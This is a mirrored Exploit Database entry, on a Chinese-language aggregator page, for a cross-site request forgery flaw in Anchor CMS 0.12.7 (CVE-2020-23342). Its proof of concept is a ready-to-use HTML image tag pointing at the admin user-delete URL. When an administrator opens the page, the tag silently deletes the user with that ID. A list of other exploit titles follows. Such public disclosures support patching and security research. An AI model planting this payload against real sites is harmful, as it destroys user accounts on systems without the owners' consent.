Anchor CMS 0.12.7 – CSRF (Delete user)

Exploit Database
42 阅读

作者： Ninad Mishra

日期： 2021-01-21
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/49451/

# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342


###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html

================================ 
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================ 
Where (21) is the user id .

When admin clicks on exploit.html link

User with id 21 will be deleted

last Exploits
Anchor CMS 0.12.7 – CSRF (Delete user)的更多信息

Joomla! Component Rapid-Recipe – Persistent Cross-Site Scripting：
Bedder CMS – Blind SQL Injection：
Xoops 2.5.7.2 – Cross-Site Request Forgery (Arbitrary User Deletions)：
AdaptCMS 3.0.3 – Multiple Vulnerabilities：
LiSK CMS 4.4 – SQL Injection：
FortiLogger 4.4.2.2 – Unauthenticated Arbitrary File Upload (Metasploit)：
WordPress Plugin Spider Catalog 1.4.6 – Multiple Vulnerabilities：
CHIYU BF430 TCP IP Converter – Stored Cross-Site Scripting：